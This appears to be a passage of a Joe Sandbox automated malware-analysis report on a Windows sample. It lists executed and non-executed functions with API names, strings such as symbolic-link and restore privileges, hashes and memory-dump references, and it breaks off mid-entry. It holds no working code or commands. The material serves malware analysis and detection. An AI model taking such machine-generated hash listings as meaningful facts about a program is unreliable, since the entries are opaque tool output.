                                                  • Opcode ID: a5f5cd90ecfc93bd18f79672adc2751a08639cb5ceed3b8feb65df2eba1c27a0
                                                  • Instruction ID: d0d0d5d89f49c11dad15dde40c0e90b96ad2ccb279cb5b7c1a8f4bebd90f22bd
                                                  • Opcode Fuzzy Hash: a5f5cd90ecfc93bd18f79672adc2751a08639cb5ceed3b8feb65df2eba1c27a0
                                                  • Instruction Fuzzy Hash: 7E217F22B25A8262EA08FF20E5663F96310FB44789F944071E79DC76A3CF3CE5A5C301
                                                  Function 00007FF6CAA0124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                  • Instruction ID: b5477be3f2cead97616841deffd1646f815dbd2ff9cc93cbbb3ec0b9c13a5dc8
                                                  • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                  • Instruction Fuzzy Hash: 18118E3291C7828AF7109FD1B8A05B972A4FB58381F5401B8EACFC7692DF3CE4128704
                                                  Function 00007FF6CA9C3AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: 69957ef0d3d2f58a7dead33f72e43e67ea7fb9c623eb1e5576ce27618050ff46
                                                  • Instruction ID: 3ad998aa464d42f9db915bb54797c1ab998e3ef1deedb01800c171bf55a928fb
                                                  • Opcode Fuzzy Hash: 69957ef0d3d2f58a7dead33f72e43e67ea7fb9c623eb1e5576ce27618050ff46
                                                  • Instruction Fuzzy Hash: BA010862E28A8581EA15AF68F45223A7361FF89795F405271EADC87AE7DF2CD0418704
                                                  Function 00007FF6CA9F1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9F1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6CA9F1573,?,?,?,00007FF6CA9F192A), ref: 00007FF6CA9F162B
                                                  • DloadProtectSection.DELAYIMP ref: 00007FF6CA9F15C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: DloadHandleModuleProtectSection
                                                  • String ID:
                                                  • API String ID: 2883838935-0
                                                  • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                  • Instruction ID: 46e0b84b20de0dea1201404ce4c02ea0a8882f2720325bd52e809d16e4052d07
                                                  • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                  • Instruction Fuzzy Hash: 9E11B164D5854741FB589F96BC693702360AF18747F5401BCEA8EC72A2EE2CA556C740
                                                  Function 00007FF6CA9D3EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D40BC: FindFirstFileW.KERNELBASE ref: 00007FF6CA9D410B
                                                    • Part of subcall function 00007FF6CA9D40BC: FindFirstFileW.KERNELBASE ref: 00007FF6CA9D415E
                                                    • Part of subcall function 00007FF6CA9D40BC: GetLastError.KERNEL32 ref: 00007FF6CA9D41AF
                                                  • FindClose.KERNELBASE(?,?,00000000,00007FF6CA9E0811), ref: 00007FF6CA9D3EFD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                  • String ID:
                                                  • API String ID: 1464966427-0
                                                  • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                  • Instruction ID: def547e94db6800a0874eefeb56c347f2813b903f105cb7955ce7416c26de3f4
                                                  • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                  • Instruction Fuzzy Hash: DEF0F462D1868181EB109F75B11217A33609B09BB6F1413B4EABDC72C7CE28D4C4C744
                                                  Function 00007FF6CA9D2490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID:
                                                  • API String ID: 3081899298-0
                                                  • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                  • Instruction ID: 092c641326b68f21a374b4bbd1b0818ce224b80715be3bec5185fd7a9cf1cb34
                                                  • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                  • Instruction Fuzzy Hash: 7BD02222D0944082DD008F39B8A203C2300AF8233BFA003B0CA7EC22E2CE1C90C6E302
                                                  Function 00007FF6CA9D7FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory
                                                  • String ID:
                                                  • API String ID: 1611563598-0
                                                  • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                  • Instruction ID: 132512fe4dd5fdb3e78a36f1fe11c32b7caee0b1dcaec11e244fd83e2171a613
                                                  • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                  • Instruction Fuzzy Hash: 25C08C20F15502C1DA089F2AD8DA01823A4BB44B06B608074C14DC2120CE2CC4FA9349
                                                  Function 00007FF6CA9FFA04 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AllocHeap
                                                  • String ID:
                                                  • API String ID: 4292702814-0
                                                  • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                  • Instruction ID: 872fbfe9df2f9627d81b193196d98c06ab989412d65d6f345436438b8e88096c
                                                  • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                  • Instruction Fuzzy Hash: EDF06251B2960745FE545FA1BD323B412905F44B86F0854B9E98FC63D3FD1CE5814110
                                                  Function 00007FF6CA9FD94C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AllocHeap
                                                  • String ID:
                                                  • API String ID: 4292702814-0
                                                  • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                  • Instruction ID: efd4d0cd91ebec77261e9fb063fbe0d0f5276e6914594b8db4c1707b563d1e03
                                                  • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                  • Instruction Fuzzy Hash: 3BF08250B2A24744FF145EF17C7227422905F447AAF0856B8FDEEC63D3EE1CA4C18111
                                                  Function 00007FF6CA9D20D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                  • Instruction ID: ad1db4119752621d4a074c8e04887b6b0b598e531cc13dc16b341587553e07c4
                                                  • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                  • Instruction Fuzzy Hash: 1BF08132E1868285FB248F20F1962792660EB14B7AF488379D7BDC11D5CE28D8D5C701

                                                  Non-executed Functions

                                                  Function 00007FF6CA9CC2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastProcesswcscpy$ControlCreateCurrentDeleteDeviceDirectoryOpenRemoveToken
                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                  • API String ID: 1185621794-3508440684
                                                  • Opcode ID: a84aa70939fdc4d5130ca79eb44cdbeddb280aae2f0e340eeceaf87b90cfbfd1
                                                  • Instruction ID: e906180a80a81dfc5f2418e79365f62f8d6d666f61cf1481ba0d089e5649cfe8
                                                  • Opcode Fuzzy Hash: a84aa70939fdc4d5130ca79eb44cdbeddb280aae2f0e340eeceaf87b90cfbfd1
                                                  • Instruction Fuzzy Hash: 8162F562F28A4245FB00EFB8E4662BD2761EB457A9F504271DAADD3AD6DF3CD185C300
                                                  Function 00007FF6CA9DF180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                  • String ID: %ls$%s: %s
                                                  • API String ID: 2539828978-2259941744
                                                  • Opcode ID: 2a428d3ebb24feb53c72cbcb96e10c35073f7b4c7138419c8edb3699ce975ff8
                                                  • Instruction ID: 1dce1d2379d84cf724647bc9ce72e88225896d4f8461c4330f61336123a0844d
                                                  • Opcode Fuzzy Hash: 2a428d3ebb24feb53c72cbcb96e10c35073f7b4c7138419c8edb3699ce975ff8
                                                  • Instruction Fuzzy Hash: 39B2A962E6868241EA109F69F4662BAA351FFC5791F104376E6DDC7ADBEE2CD180C340
                                                  Function 00007FF6CAA02550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfomemcpy_s
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 1759834784-2761157908
                                                  • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                  • Instruction ID: a7e9334963d8cc1768f9e1f6a351beb426c805d6535c1991fa7b7d759473d10a
                                                  • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                  • Instruction Fuzzy Hash: 96B2F772E182C28BE7258EA9E4A06FD37A1FB44389F505175DB4BD7B84DF39E5068B00
                                                  Function 00007FF6CA9D1A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                  • String ID: rtmp
                                                  • API String ID: 3587137053-870060881
                                                  • Opcode ID: b2302a8994294e2a6b84eb5060b7698c6ea0863429eff8cfdf69f426307ffe72
                                                  • Instruction ID: db68cd2720fa867710bf4e8dc72fd4cac4ac194e5177d7fdcbdf0eeba41a0218
                                                  • Opcode Fuzzy Hash: b2302a8994294e2a6b84eb5060b7698c6ea0863429eff8cfdf69f426307ffe72
                                                  • Instruction Fuzzy Hash: 6BF1C123F28A8281EB10DF65E4A11BD6771EB85785F600176EA8DC3AAADF3CD5C5C340
                                                  Function 00007FF6CA9D5B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 1693479884-0
                                                  • Opcode ID: eb320a448f2f5b685a05a21c57fd524cc8e4434a836e962e5226f9c8e5b08568
                                                  • Instruction ID: 97e6f9a74b32e5a55899def41bd0de5dd040aa23aa803db1a253c9e21369f9ac
                                                  • Opcode Fuzzy Hash: eb320a448f2f5b685a05a21c57fd524cc8e4434a836e962e5226f9c8e5b08568
                                                  • Instruction Fuzzy Hash: D6A19162F24A5184FF009FB9A8661BC2361AF45BE5B144275DEADD7BDADE3CD082C304
                                                  Function 00007FF6CA9F3170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                  • Instruction ID: f2895b8bc9a73c009d4f28b8b8fe4dbf4004aa6f995d55eae142826f46d386dc
                                                  • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                  • Instruction Fuzzy Hash: 92317272618B818AEB648F60F8603EE3360FB88745F444039DA8E87B89DF3CD549C714
                                                  Function 00007FF6CA9F76D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
